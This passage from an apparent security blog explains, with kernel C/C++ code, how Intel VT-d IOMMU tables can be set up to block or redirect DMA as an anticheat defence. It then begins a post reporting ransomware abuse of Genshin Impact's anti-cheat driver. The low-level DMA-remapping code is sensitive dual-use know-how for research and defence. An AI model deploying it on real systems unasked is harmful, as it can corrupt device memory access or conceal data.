    VTD_SECOND_LEVEL_PAGING_ENTRY* pdpt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pd;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pml4e;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pdpte;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
</code></pre>
<p>The implementation supports granular memory protection through page splitting mechanisms. When fine-grained control is needed over a specific 4KB page within a 2MB large page, the <code>Split2MbPage</code> function dynamically splits the large page into 512 individual 4KB pages. This operation is crucial for implementing precise memory protection policies.</p>
<pre><code class="lang-c"><span class="hljs-function">VTD_SECOND_LEVEL_PAGING_ENTRY* <span class="hljs-title">Split2MbPage</span><span class="hljs-params">(IN OUT VTD_SECOND_LEVEL_PAGING_ENTRY* PageDirectoryEntry)</span> </span>{
    pageTable = (VTD_SECOND_LEVEL_PAGING_ENTRY*)cpp::kMalloc(PAGE_SIZE);
    baseAddress = ((UINT64)PageDirectoryEntry-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
        ((UINT64)PageDirectoryEntry-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>);

    <span class="hljs-keyword">for</span> (UINT64 ptIndex = <span class="hljs-number">0</span>; ptIndex &lt; <span class="hljs-number">512</span>; ++ptIndex) {
        pageTable[ptIndex].Uint64 = baseAddress;
        pageTable[ptIndex].Bits.Read = readable;
        pageTable[ptIndex].Bits.Write = writable;
        baseAddress += PAGE_SIZE;
    }
}
</code></pre>
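<p>Since the excerpt above omits the declarations and the return path, here is a self-contained user-mode sketch of the same splitting idea. It works on raw 64-bit entry values instead of the driver's bitfield type, uses <code>calloc</code> in place of the kernel allocator, and assumes the VT-d second-level entry layout (Read in bit 0, Write in bit 1, Page Size in bit 7). <code>SketchSplit2MbPage</code> and the <code>SL_*</code> names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;stdlib.h&gt;

#define SKETCH_PAGE_SIZE 4096u
#define SKETCH_ENTRIES   512u
#define SL_READ      (1ull &lt;&lt; 0)   /* second-level entry: Read permission */
#define SL_WRITE     (1ull &lt;&lt; 1)   /* second-level entry: Write permission */
#define SL_PAGE_SIZE (1ull &lt;&lt; 7)   /* set in a PDE that maps a 2MB page */
#define SL_ADDR_MASK 0x000FFFFFFFFFF000ull

/* Build a page table that maps the same 2MB range as `pde` with 512 4KB
   entries inheriting the PDE's read/write bits. Returns NULL if `pde` is not
   a large page or if allocation fails; the caller owns the returned table. */
uint64_t *SketchSplit2MbPage(uint64_t pde)
{
    uint64_t *pt;
    uint64_t base = pde &amp; SL_ADDR_MASK;
    uint64_t perms = pde &amp; (SL_READ | SL_WRITE);

    if ((pde &amp; SL_PAGE_SIZE) == 0)
        return NULL;                       /* nothing to split */

    pt = calloc(SKETCH_ENTRIES, sizeof(*pt));
    if (pt == NULL)
        return NULL;

    for (uint32_t i = 0; i &lt; SKETCH_ENTRIES; ++i)
        pt[i] = (base + (uint64_t)i * SKETCH_PAGE_SIZE) | perms;

    return pt;
}
</code></pre>
<p>In a real driver the PDE would afterwards have to be repointed at the physical address of the new table with the Page Size bit cleared, and both the PDE and the new table written back to memory. That part is left out of the sketch.</p>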
<p>Going back to <code>BuildPassthroughTranslations</code>, the function constructs a page table hierarchy consisting of:</p>
<ol>
<li><p>Root Table: The highest level table containing 256 entries, one for each PCI bus number</p>
</li>
<li><p>Context Table: Referenced by root entries, containing device and function specific translations</p>
</li>
<li><p>Second-level page tables: PML4, PDPT (Page Directory Pointer Table), PD (Page Directory), and PT (Page Table) forming a four-level address translation structure</p>
</li>
</ol>
<p>The root table initialization is particularly important:</p>
<pre><code class="lang-c">defaultRootValue.Uint128.Uint64Hi = defaultRootValue.Uint128.Uint64Lo = <span class="hljs-number">0</span>;
UINT64 contextTable = (UINT64)Memory::VirtToPhy(Translations-&gt;ContextTable);
defaultRootValue.Bits.ContextTablePointerLo = (UINT32)(contextTable &gt;&gt; <span class="hljs-number">12</span>);
defaultRootValue.Bits.ContextTablePointerHi = (UINT32)(contextTable &gt;&gt; <span class="hljs-number">32</span>);
defaultRootValue.Bits.Present = TRUE;
</code></pre>
<p>Each root entry is a 128-bit structure that points to a context table. The context table is 4KB-aligned, so the low 12 bits of its physical address are always zero and the entry only stores the bits above them (hence the right shift by 12). The pointer is split into low and high components simply because the structure declares it as two bitfields. The Present bit indicates that the entry is valid and can be used by the hardware.</p>
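<p>To make the packing concrete, here is a small sketch using shifts and masks rather than bitfields. It assumes the low 64 bits of the root entry are laid out as Present in bit 0, the low pointer part in bits 12-31, and the high part in bits 32-63, mirroring the <code>Lo</code>/<code>Hi</code> fields above. The function names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Pack a 4KB-aligned context-table physical address into the low half of a
   root entry. Assumed layout: bit 0 Present, bits 12-31 Lo, bits 32-63 Hi. */
uint64_t SketchMakeRootEntryLo(uint64_t context_table_pa)
{
    uint64_t lo20 = (context_table_pa &gt;&gt; 12) &amp; 0xFFFFFull;  /* PA bits 12-31 */
    uint64_t hi32 = context_table_pa &gt;&gt; 32;                 /* PA bits 32-63 */
    return (hi32 &lt;&lt; 32) | (lo20 &lt;&lt; 12) | 1ull;              /* Present = 1 */
}

/* Recover the context-table physical address by dropping the low 12 bits. */
uint64_t SketchRootEntryToPa(uint64_t entry_lo)
{
    return entry_lo &amp; ~0xFFFull;
}
</code></pre>
<p>For an aligned table the packed value is just the physical address with the flag bits OR-ed into the low 12 bits, which is why the split into two fields does not lose any information.</p>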
<p>The context table setup demonstrates the configuration for 48-bit addressing. The <code>AddressWidth</code> field set to BIT1 (010b) specifically configures for 48-bit guest addresses, requiring four-level page tables. The <code>DomainIdentifier</code> provides isolation between different sets of remapping tables.</p>
<pre><code class="lang-c">defaultContextValue.Bits.DomainIdentifier = <span class="hljs-number">2</span>;
defaultContextValue.Bits.AddressWidth = BIT1;  <span class="hljs-comment">// 010b: 48-bit AGAW (4-level page table)</span>
defaultContextValue.Bits.SecondLevelPageTranslationPointerLo = (UINT32)(Pml4 &gt;&gt; <span class="hljs-number">12</span>);
defaultContextValue.Bits.SecondLevelPageTranslationPointerHi = (UINT32)(Pml4 &gt;&gt; <span class="hljs-number">32</span>);
defaultContextValue.Bits.Present = TRUE;
</code></pre>
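<p>The relation between the <code>AddressWidth</code> encoding and the table depth can be written down directly. The sketch below covers only the encodings 001b, 010b and 011b (3-, 4- and 5-level tables) and treats everything else as unsupported. The helper names are made up for illustration.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Number of second-level paging levels selected by an AW encoding, or -1. */
int SketchAwToLevels(uint32_t aw)
{
    return (aw &gt;= 1 &amp;&amp; aw &lt;= 3) ? (int)aw + 2 : -1;
}

/* Adjusted guest address width in bits for an AW encoding, or -1.
   Each extra level adds 9 address bits: 39, 48, 57. */
int SketchAwToAgawBits(uint32_t aw)
{
    return (aw &gt;= 1 &amp;&amp; aw &lt;= 3) ? 30 + 9 * (int)aw : -1;
}
</code></pre>
<p>With <code>BIT1</code> (value 2) this gives four levels and 48 bits, matching the comment in the snippet above.</p>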
<p>The second-level page tables implement the actual memory mapping.</p>
<pre><code class="lang-c">destinationPa = <span class="hljs-number">0</span>;
pml4Index = <span class="hljs-number">0</span>;
pdpt = Translations-&gt;SlPdpt[pml4Index];
pml4e = &amp;Translations-&gt;SlPml4[pml4Index];
pml4e-&gt;Uint64 = (UINT64)Memory::VirtToPhy(pdpt);
pml4e-&gt;Bits.Read = TRUE;
pml4e-&gt;Bits.Write = TRUE;
</code></pre>
<p>The code uses 2MB large pages at the PD level to reduce the number of page tables needed.</p>
<pre><code class="lang-c">pde = &amp;pd[pdIndex];
pde-&gt;Uint64 = destinationPa;
pde-&gt;Bits.Read = TRUE;
pde-&gt;Bits.Write = TRUE;
pde-&gt;Bits.PageSize = TRUE;
destinationPa += SIZE_2MB;
</code></pre>
<p>The <code>PageSize</code> bit set to TRUE indicates a 2MB page rather than a reference to a page table of 4KB pages. This optimization significantly reduces memory overhead while still providing sufficient granularity for most DMA operations.</p>
<p>Cache coherency is maintained through explicit writeback operations. This is crucial because the IOMMU hardware reads these tables directly from memory, and any cached modifications must be written back to ensure the hardware sees the updated values.</p>
<pre><code class="lang-c">CPU::WriteBackDataCacheRange(Translations, <span class="hljs-keyword">sizeof</span>(*Translations));
</code></pre>
<p>The identity mapping is created by setting the destination physical address equal to the input address (<code>destinationPa</code> variable), effectively making DMA operations initially transparent to devices while still going through the remapping hardware. This allows for later modification of the mappings to implement protection or isolation without requiring device driver changes.</p>
<p>The entire structure supports mapping up to 512GB of physical memory (one PML4 entry × 512 PDPT entries × 512 PD entries × 2MB per page), which is sufficient for most systems while keeping the page table structure manageable. The use of large pages significantly reduces the memory overhead and translation latency compared to using 4KB pages throughout the hierarchy.</p>
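<p>The arithmetic behind those numbers is easy to check. The sketch below computes the covered range and the memory spent on tables for the single-PML4-entry layout described above, once with 2MB pages and once with 4KB pages throughout. All names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define SKETCH_ENTRIES 512ull
#define SKETCH_2MB     (2ull &lt;&lt; 20)
#define SKETCH_4KB     (4ull &lt;&lt; 10)

/* Bytes covered by `pml4_entries` fully populated PML4 entries of 2MB pages. */
uint64_t SketchCoverage(uint64_t pml4_entries)
{
    return pml4_entries * SKETCH_ENTRIES * SKETCH_ENTRIES * SKETCH_2MB;
}

/* Bytes of page-table memory needed to map 512GB under one PML4 entry. */
uint64_t SketchTableBytes(int use_4kb_pages)
{
    uint64_t tables = 1 /* PML4 */ + 1 /* PDPT */ + SKETCH_ENTRIES /* PDs */;
    if (use_4kb_pages)
        tables += SKETCH_ENTRIES * SKETCH_ENTRIES;   /* one PT per PD entry */
    return tables * SKETCH_4KB;
}
</code></pre>
<p>With 2MB pages the tables take 514 × 4KB, roughly 2MB. Mapping the same range with 4KB pages would need another 262,144 page tables, a bit over 1GB.</p>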
<p><code>ChangePermissionOfPageForAllDevices</code> then provides fine-grained DMA access control by editing the hardware's page table entries. It operates on the Intel VT-d second-level page table structure, which enforces DMA access control in hardware at 4KB page granularity.</p>
<pre><code class="lang-cpp"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ChangePermissionOfPageForAllDevices</span><span class="hljs-params">(
    IN OUT DMAR_TRANSLATIONS* Translations,
    IN UINT64 Address,
    IN BOOLEAN AllowReadWrite,
    OUT VTD_SECOND_LEVEL_PAGING_ENTRY** AllocatedPageTable)</span>
</span>{
    PHYSICAL_ADDRESS pa = { <span class="hljs-number">0</span> };
    EFI_STATUS status;
    ADDRESS_TRANSLATION_HELPER helper;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pte;
</code></pre>
<p>The function decomposes the target address with the <code>ADDRESS_TRANSLATION_HELPER</code> union, which overlays a bitfield structure on a 64-bit value so that a 48-bit physical address can be read directly as its page table indices: PML4 (bits 47-39), PDPT (bits 38-30), PD (bits 29-21), and PT (bits 20-12), with the remaining bits (11-0) forming the page offset. These indices are what the function uses to walk the page table hierarchy.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">union</span> _ADDRESS_TRANSLATION_HELPER {
    UINT64 AsUInt64;
    <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
        UINT64 Offset : <span class="hljs-number">12</span>;    <span class="hljs-comment">// Bits 0-11: Page offset within 4KB</span>
        UINT64 Pt : <span class="hljs-number">9</span>;         <span class="hljs-comment">// Bits 12-20: Page Table index</span>
        UINT64 Pd : <span class="hljs-number">9</span>;         <span class="hljs-comment">// Bits 21-29: Page Directory index</span>
        UINT64 Pdpt : <span class="hljs-number">9</span>;       <span class="hljs-comment">// Bits 30-38: Page Directory Pointer Table index</span>
        UINT64 Pml4 : <span class="hljs-number">9</span>;       <span class="hljs-comment">// Bits 39-47: PML4 index</span>
        UINT64 Reserved : <span class="hljs-number">16</span>;   <span class="hljs-comment">// Bits 48-63: Must be zero for valid addresses</span>
    } AsIndex;
} ADDRESS_TRANSLATION_HELPER;
</code></pre>
<p>The function bounds-checks the target address by examining the PML4 index. Because the identity mapping only populates PML4 entry 0, any address with a non-zero PML4 index lies beyond the 512GB that the tables cover, and the function fails immediately with STATUS_UNSUCCESSFUL. This keeps the page table walk from indexing outside the tables that were actually built.</p>
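<p>The decomposition and the range check can also be expressed with shifts and masks, which avoids relying on how a particular compiler lays out bitfields. A minimal sketch, with hypothetical names:</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

typedef struct {
    uint32_t pml4, pdpt, pd, pt, offset;
} SKETCH_INDICES;

/* Split a physical address into its four 9-bit table indices and page offset. */
SKETCH_INDICES SketchDecompose(uint64_t pa)
{
    SKETCH_INDICES ix;
    ix.offset = (uint32_t)(pa &amp; 0xFFF);
    ix.pt     = (uint32_t)((pa &gt;&gt; 12) &amp; 0x1FF);
    ix.pd     = (uint32_t)((pa &gt;&gt; 21) &amp; 0x1FF);
    ix.pdpt   = (uint32_t)((pa &gt;&gt; 30) &amp; 0x1FF);
    ix.pml4   = (uint32_t)((pa &gt;&gt; 39) &amp; 0x1FF);
    return ix;
}

/* Returns 1 when `pa` lies in the first 512GB, i.e. under PML4 entry 0 with
   no bits set above bit 38. */
int SketchIsInMappedRange(uint64_t pa)
{
    return (pa &gt;&gt; 39) == 0;
}
</code></pre>
<p>Note that checking <code>pa &gt;&gt; 39</code> also rejects values with any of bits 48-63 set, which a check on the 9-bit PML4 field alone would miss.</p>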
<p>The function handles 2MB large pages by splitting them. When it encounters a page directory entry (PDE) marked with PageSize=TRUE (indicating a 2MB page), it invokes the <code>Split2MbPage</code> function, which replaces the single 2MB mapping with 512 individual 4KB page mappings that keep the original permissions. The split has to manage memory allocation, permission inheritance, and cache coherency carefully so that devices never observe a half-built table during the transition.</p>
<p>The permission modification process involves intricate physical memory manipulation. The function reconstructs the physical address of the target page table by combining the split address fields (AddressHi and AddressLo) from the page directory entry. This address is then temporarily mapped into the kernel's virtual address space using <code>MmMapIoSpaceEx</code> with specific caching attributes (PAGE_READWRITE | PAGE_NOCACHE) to ensure direct hardware access, which prevents stale cache lines from interfering with IOMMU operations.</p>
<p>We then need to write back the modified page table entries using <code>CPU::WriteBackDataCacheRange</code> so that they reach memory before the IOMMU hardware reads them. Without the write-back, the IOMMU could fetch an out-of-date entry from memory while the updated value still sits in a CPU cache line. Stale permissions held in the IOMMU's own caches are a separate problem, which the IOTLB invalidation covers.</p>
<p>The permission change itself is a direct update of the page table entry's permission bits: the function sets or clears both Read and Write according to the <code>AllowReadWrite</code> parameter. Once the bits are cleared and the change is visible to the hardware, the IOMMU blocks any DMA operation targeting the corresponding 4KB page and raises a remapping fault that can be logged and handled by system software. Enforcement happens in hardware, so it adds no per-access software overhead once the permissions are set.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Locate the PDE for our target address</span>
    pde = &amp;Translations-&gt;SlPd[helper.AsIndex.Pml4][helper.AsIndex.Pdpt][helper.AsIndex.Pd];

    <span class="hljs-comment">// If this is a 2MB page, split it into 4KB pages</span>
    <span class="hljs-keyword">if</span> (pde-&gt;Bits.PageSize != FALSE) {
        *AllocatedPageTable = Split2MbPage(pde);
        <span class="hljs-keyword">if</span> (*AllocatedPageTable == <span class="hljs-literal">NULL</span>) {
            status = STATUS_RESOURCE_NOT_OWNED;
            <span class="hljs-keyword">goto</span> Exit;
        }
    }

    <span class="hljs-comment">// Get the physical address of the page table</span>
    pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)(((UINT64)pde-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
        ((UINT64)pde-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>));

    <span class="hljs-comment">// Map the page table into kernel virtual address space</span>
    pa.QuadPart = (ULONGLONG)pt;
    pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)MmMapIoSpaceEx(
        pa, 
        PAGE_SIZE, 
        PAGE_READWRITE | PAGE_NOCACHE
    );

    <span class="hljs-comment">// Update the specific PTE's permissions</span>
    pte = &amp;pt[helper.AsIndex.Pt];
    pte-&gt;Bits.Read = AllowReadWrite;
    pte-&gt;Bits.Write = AllowReadWrite;

    <span class="hljs-comment">// Ensure changes are written to memory</span>
    CPU::WriteBackDataCacheRange(pte, <span class="hljs-keyword">sizeof</span>(*pte));
</code></pre>
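<p>The snippet above updates Read and Write with two separate bitfield assignments. If you want both bits to change together, one option (an assumption on my side, not something the original code does) is to build the new value in a local and store it once. A sketch on raw 64-bit entries, with hypothetical names:</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define SL_READ  (1ull &lt;&lt; 0)   /* second-level entry: Read permission */
#define SL_WRITE (1ull &lt;&lt; 1)   /* second-level entry: Write permission */

/* Set or clear both permission bits with one store of the whole entry, so a
   reader never sees Read already updated while Write is still the old value. */
void SketchSetPtePermissions(volatile uint64_t *pte, int allow_read_write)
{
    uint64_t value = *pte;

    if (allow_read_write)
        value |= (SL_READ | SL_WRITE);
    else
        value &amp;= ~(SL_READ | SL_WRITE);

    *pte = value;   /* one aligned 64-bit store */
}
</code></pre>
<p>The cache write-back and the IOTLB invalidation are still required afterwards; the single store only removes the window between the two bit updates.</p>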
<p>The IOMMU hardware maintains its own Translation Lookaside Buffer (IOTLB), which caches address translations and permissions for performance. When page table entries are modified, these cached values must be explicitly invalidated for the new permissions to take effect. The invalidation is issued through MMIO registers in the IOMMU, in particular the IOTLB Invalidate Register, which both triggers the invalidation and controls its scope and type. The invalidation command includes flags for draining both read (DR) and write (DW) requests, ensuring that all in-flight DMA operations complete before the new permissions take effect.</p>
<p>The IIRG (IOTLB Invalidation Request Granularity) field selects the scope of the invalidation: global, domain-selective, or page-selective within a domain. The hardware also implements a handshake: software must wait for the IVT (Invalidate IOTLB) bit to clear, which indicates that the invalidation has completed, before proceeding. Without this synchronization, DMA operations might still use cached permissions from the old page table entries, potentially bypassing the intended access restrictions.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">VTD_IOTLB_INVALIDATE_REG</span> {</span>
    <span class="hljs-keyword">union</span> {
        <span class="hljs-class"><span class="hljs-keyword">struct</span> {</span>
            UINT64 Reserved1 : <span class="hljs-number">32</span>;           <span class="hljs-comment">// Bits 0-31: reserved</span>
            UINT64 Domain_Id : <span class="hljs-number">16</span>;           <span class="hljs-comment">// Bits 32-47: domain ID for selective invalidation</span>
            UINT64 DW : <span class="hljs-number">1</span>;                   <span class="hljs-comment">// Bit 48: Drain Writes</span>
            UINT64 DR : <span class="hljs-number">1</span>;                   <span class="hljs-comment">// Bit 49: Drain Reads</span>
            UINT64 Reserved2 : <span class="hljs-number">7</span>;            <span class="hljs-comment">// Bits 50-56: reserved</span>
            UINT64 IAIG : <span class="hljs-number">2</span>;                 <span class="hljs-comment">// Bits 57-58: actual invalidation granularity (read-only)</span>
            UINT64 Reserved3 : <span class="hljs-number">1</span>;            <span class="hljs-comment">// Bit 59: reserved</span>
            UINT64 IIRG : <span class="hljs-number">2</span>;                 <span class="hljs-comment">// Bits 60-61: invalidation request granularity</span>
            UINT64 Reserved4 : <span class="hljs-number">1</span>;            <span class="hljs-comment">// Bit 62: reserved</span>
            UINT64 IVT : <span class="hljs-number">1</span>;                  <span class="hljs-comment">// Bit 63: Invalidate IOTLB</span>
        } Bits;
        UINT64 Uint64;
    };
} VTD_IOTLB_INVALIDATE_REG, *PVTD_IOTLB_INVALIDATE_REG;

<span class="hljs-comment">// Invalidate IOTLB and wait for completion</span>
reg.InvalidateIoTlb(B_IOTLB_REG_IVT | V_IOTLB_REG_IIRG_GLOBAL | V_IOTLB_REG_DR | V_IOTLB_REG_DW);
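<span class="hljs-comment">// IVT is bit 63, so poll with a 64-bit read (assuming B_IOTLB_REG_IVT is defined as bit 63)</span>
<span class="hljs-keyword">while</span> ((CPU::MmIoRead&lt;DWORD64&gt;(reg.RegisterBase + R_IOTLB_REG) &amp; B_IOTLB_REG_IVT) != <span class="hljs-number">0</span>) {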
    _mm_pause();  <span class="hljs-comment">// Wait for invalidation to complete</span>
}
</code></pre>
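<p>As a rough illustration of the command encoding and the wait loop, here is a user-mode sketch that builds a domain-selective invalidation command and polls a simulated register with a bounded spin count. The bit positions are taken from the VT-d specification's IOTLB_REG layout as I understand it (IVT bit 63, IIRG bits 60-61, DR bit 49, DW bit 48, domain ID bits 32-47), so verify them against the spec revision you target. All names are hypothetical.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define IOTLB_IVT         (1ull &lt;&lt; 63)  /* Invalidate IOTLB; cleared by hardware when done */
#define IOTLB_IIRG_GLOBAL (1ull &lt;&lt; 60)  /* IIRG = 01b: global invalidation */
#define IOTLB_IIRG_DOMAIN (2ull &lt;&lt; 60)  /* IIRG = 10b: domain-selective invalidation */
#define IOTLB_DR          (1ull &lt;&lt; 49)  /* Drain Reads */
#define IOTLB_DW          (1ull &lt;&lt; 48)  /* Drain Writes */

/* Build a domain-selective invalidation command for `domain_id`. */
uint64_t SketchDomainInvalidateCommand(uint16_t domain_id)
{
    return IOTLB_IVT | IOTLB_IIRG_DOMAIN | IOTLB_DR | IOTLB_DW |
           ((uint64_t)domain_id &lt;&lt; 32);
}

/* Poll a 64-bit register until IVT clears or `max_spins` reads were made.
   Returns 1 on completion, 0 on timeout. */
int SketchWaitForIvtClear(const volatile uint64_t *iotlb_reg, uint32_t max_spins)
{
    while (max_spins-- != 0) {
        if ((*iotlb_reg &amp; IOTLB_IVT) == 0)
            return 1;
    }
    return 0;
}
</code></pre>
<p>A bounded wait like this avoids hanging the system forever if the hardware never clears IVT. What to do on timeout is a policy decision the sketch leaves open.</p>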
<p>Where <code>ChangePermissionOfPageForAllDevices</code> controls read/write access through the page table entry's permission bits, <code>ChangePointerOfPageForAllDevices</code> goes a step further and changes the physical address stored in the entry. This implements DMA remapping: DMA operations aimed at one physical page are transparently redirected to another.</p>
<pre><code class="lang-cpp"><span class="hljs-function">EFI_STATUS <span class="hljs-title">ChangePointerOfPageForAllDevices</span><span class="hljs-params">(
    IN OUT DMAR_TRANSLATIONS* Translations,
    IN UINT64 Address,
    IN UINT64 SubstituteAddress,
    OUT VTD_SECOND_LEVEL_PAGING_ENTRY** AllocatedPageTable)</span>
</span>{
    PHYSICAL_ADDRESS pa = { <span class="hljs-number">0</span> };
    EFI_STATUS status;
    ADDRESS_TRANSLATION_HELPER helper;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pde;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pt;
    VTD_SECOND_LEVEL_PAGING_ENTRY* pte;
</code></pre>
<p>The function accepts either a virtual or a physical address. It first checks whether the provided value is a valid virtual address using <code>MmIsAddressValid</code> and, if so, translates it to a physical address through <code>Memory::VirtToPhy</code>; otherwise the value is treated as a physical address already. This is a heuristic rather than a strict validation, since a physical address whose numeric value also happens to be a mapped virtual address would be translated as well. The <code>ADDRESS_TRANSLATION_HELPER</code> union then decomposes the resulting physical address into its constituent page table indices.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">if</span> (MmIsAddressValid((PVOID)Address))
    Address = Memory::VirtToPhy((PVOID)Address);

helper.AsUInt64 = Address;
DbgMsg(<span class="hljs-string">"[VT-d] Target 0x%llx at pml4: 0x%llx, pdpt: 0x%llx, pdt: 0x%llx, pt: 0x%llx"</span>,
    helper.AsUInt64,
    helper.AsIndex.Pml4, helper.AsIndex.Pdpt, helper.AsIndex.Pd, helper.AsIndex.Pt);
</code></pre>
<p>The page table manipulation process begins with locating the appropriate Page Directory Entry (PDE) through the calculated indices. When encountering a 2MB large page, indicated by the PageSize bit in the PDE, the function invokes the specialized <code>Split2MbPage</code> operation. This complex procedure allocates a new page table and redistributes the large page mapping into 512 individual 4KB page entries, maintaining consistency throughout the transition.</p>
<pre><code class="lang-cpp">pde = &amp;Translations-&gt;SlPd[helper.AsIndex.Pml4][helper.AsIndex.Pdpt][helper.AsIndex.Pd];
<span class="hljs-keyword">if</span> (pde-&gt;Bits.PageSize != FALSE)
{
    *AllocatedPageTable = Split2MbPage(pde);
    <span class="hljs-keyword">if</span> (*AllocatedPageTable == <span class="hljs-literal">NULL</span>)
    {
        status = STATUS_RESOURCE_NOT_OWNED;
        <span class="hljs-keyword">goto</span> Exit;
    }
}
</code></pre>
<p>The actual address remapping reconstructs the physical address of the page table from the PDE's split address fields, maps it into the kernel's address space using <code>MmMapIoSpaceEx</code> with specific caching attributes, and modifies the target PTE. The substitute address undergoes similar virtual-to-physical translation if necessary, and its lower and upper portions are stored in the PTE's address fields.</p>
<pre><code class="lang-cpp">pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)(((UINT64)pde-&gt;Bits.AddressLo &lt;&lt; <span class="hljs-number">12</span>) |
    ((UINT64)pde-&gt;Bits.AddressHi &lt;&lt; <span class="hljs-number">32</span>));
pa.QuadPart = (ULONGLONG)pt;
pt = (VTD_SECOND_LEVEL_PAGING_ENTRY*)MmMapIoSpaceEx(pa, PAGE_SIZE, PAGE_READWRITE | PAGE_NOCACHE);
pte = &amp;pt[helper.AsIndex.Pt];

<span class="hljs-keyword">if</span> (MmIsAddressValid((PVOID)SubstituteAddress))
    SubstituteAddress = Memory::VirtToPhy((PVOID)SubstituteAddress);

pte-&gt;Bits.AddressLo = SubstituteAddress &gt;&gt; <span class="hljs-number">12</span>;
pte-&gt;Bits.AddressHi = SubstituteAddress &gt;&gt; <span class="hljs-number">32</span>;
</code></pre>
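<p>The pointer swap boils down to replacing the address bits of the entry while leaving everything below bit 12 alone. A minimal sketch on raw 64-bit entries, assuming the address field occupies bits 12-51 (<code>SketchRedirectPte</code> is a hypothetical name):</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

#define SL_ADDR_MASK 0x000FFFFFFFFFF000ull  /* address bits 12-51 (assumed width) */

/* Point a 4KB PTE at `substitute_pa`, keeping its permission and attribute
   bits. Any offset inside the page (low 12 bits) is dropped. */
uint64_t SketchRedirectPte(uint64_t pte, uint64_t substitute_pa)
{
    return (pte &amp; ~SL_ADDR_MASK) | (substitute_pa &amp; SL_ADDR_MASK);
}
</code></pre>
<p>After the swap, a device that issues DMA to the original page still sees a present, readable mapping, but the data comes from the substitute page.</p>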
<p>While some anticheat vendors have used interesting methods to limit attacker visibility into game-related memory regions, such as CPU paging-based guarded regions (<a target="_blank" href="https://reversing.info/posts/guardedregions/">which Vanguard famously already implements</a>), these methods can easily be bypassed using DMA tools like <a target="_blank" href="https://www.unknowncheats.me/forum/counterstrike-global-offensive/582688-reading-game-data-using-dma-device-leechcorepyc.html">MemProcFS</a>. That said, this method is really a proof-of-concept shitpost rather than anything that could actually be deployed in a production environment today; a lot of driver interactions need to be taken into account before one could truly implement this. But it would be nice if anticheats could stop expecting the worst out of people who want to play fairly.</p>
]]></content:encoded></item><item><title><![CDATA[Smuggling Malware Using HoYoverse Games]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

Hoyoverse, the studio behind some of the most popular games in recent years, has increasingly found itself in the crosshairs of cybercriminals and threat actors. With the company recently securing the title of "...]]></description><link>https://research.meekolab.com/smuggling-malware-using-hoyoverse-games</link><guid isPermaLink="true">https://research.meekolab.com/smuggling-malware-using-hoyoverse-games</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 26 Sep 2024 11:10:55 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1727349018484/87097601-9547-48f2-ae1a-7ecf74fa09ba.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
</blockquote>
<p>Hoyoverse, the studio behind some of the most popular games in recent years, has increasingly found itself in the crosshairs of cybercriminals and threat actors. With the company recently securing the title of "<a target="_blank" href="https://en.wikipedia.org/wiki/List_of_most_expensive_video_games_to_develop">Most Expensive Game to Develop</a>" and repeatedly breaking sales records, it's no surprise that its games have become prime targets. Hoyoverse, or its parent company MiHoYo, depending on the interpretation of its complex corporate structure, has turned into a revenue juggernaut—making it a lucrative focus for attackers.</p>
<p>Despite employing several anticheat solutions—such as MiHoYo Protect (mhyprot), Hoyoverse Kernel Protection (HoYoKProtect), and Tencent's Anti Cheat Expert (ACE)—all have been circumvented by various cheating groups. The games and their supporting anticheat engines have also attracted attention from threat actors seeking to exploit vulnerabilities in their drivers and applications.</p>
<p>In fact, there have been multiple instances of MiHoYo’s game binaries and related applications being leveraged to distribute malware. Below is a brief, albeit non-exhaustive, overview of significant incidents involving MiHoYo’s software being compromised or exploited for malicious purposes.</p>
<h1 id="heading-genshin-impact-vulnerable-driver-rever-ransomware">Genshin Impact Vulnerable Driver (Rever Ransomware)</h1>
<p>In August 2022, TrendMicro <a target="_blank" href="https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html">reported</a> on a Babuk-based ransomware attack that abused Genshin Impact's anti-cheat driver to gain kernel-level privileges and kill antivirus processes. It was <a target="_blank" href="https://cymulate.com/blog/freeloader-threat-intelligence-analyst-and-malware-researcher-guide/">later found</a> that the ransom note was similar to the one left by Rever Ransomware.</p>
<p>While Genshin Impact doesn't feature PvP mechanisms, its stringent monetization structure necessitates robust anti-tampering technologies to ensure the integrity of its random number generation (RNG) systems, thereby safeguarding MiHoYo's monetization model.</p>
